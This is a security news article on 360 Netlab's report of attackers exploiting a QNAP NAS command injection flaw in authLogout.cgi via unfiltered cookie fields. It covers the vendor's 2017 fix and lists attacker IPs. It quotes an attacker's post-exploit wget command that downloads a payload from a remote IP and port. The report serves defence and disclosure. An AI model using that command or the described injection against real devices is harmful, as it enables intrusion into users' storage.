Hackers are scanning the Internet for vulnerable network-attached storage (NAS) devices running multiple QNAP firmware versions vulnerable to a remote code execution (RCE) vulnerability addressed by the vendor 3 years ago.
According to a report published by researchers at Qihoo 360’s Network Security Research Lab (360 Netlab) the attackers are exploiting the remote command execution vulnerability due to a command injection issue that resides in the firmware QNAP NAS devices.
The researchers discovered that the issue resides in the CGI program
that is used when user logout to select the corresponding logout function based on the field name in the Cookie.
“The problem is QPS_SID, QMS_SID and QMMS_SID does not filter special characters and directly calls the snprintf function to splice curl command string and calls the system function to run the string, thus making command injection possible.” reads the report published by 360 Netlab.
An unauthenticated, remote attacker could exploit the flaw to achieve authentication using the authLogout.cgi executable because it doesn’t filter out special characters from the input before invoking the system function to run the command string. This behavior makes possible command injection and allows for remote code execution.
360 Netlab’s researchers reported the flaw to QNAP PSIRT on May 13, and on August 12 the vendor confirmed that the issue has been addressed in a previous security update, but that there still are QNAP NAS devices online that have to be upgraded.
QNAP addressed the vulnerability with the release of firmware version 4.3.3 on July 21, 2017. The fix proposed by the vendor replace the function used to run the command strings.
“This release replaced the system function with qnap_exec, and the qnap_exec function is defined in the /usr/lib/libuLinux_Util.so.0,” continues 360 Netlab. “By using the execv to execute custom command, command injection has been avoided.”
The researchers noticed that two attackers IP, 184.108.40.206 and 220.127.116.11, were using the same payload downloaded with a wget http://18.104.22.168:8096/aaa file after successful exploits.
360 Netlab pointed out that attackers did not fully automate the attack using a botnet, at the time their true purpose is still a mystery.
“We recommend that QNAP NAS users check and update their firmwares in a timely manner and also check for abnormal processes and network connections,” the researchers conclude.
The report published by 360 Netlab includes indicators of compromise (IoCs) along with the list of all affected QNAP firmware versions.
The United States Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom’s National Cyber Security Centre (NCSC) also issued a joint advisory about a massive ongoing campaign spreading the QSnatch data-stealing malware.
(SecurityAffairs – hacking, QNAP NAS)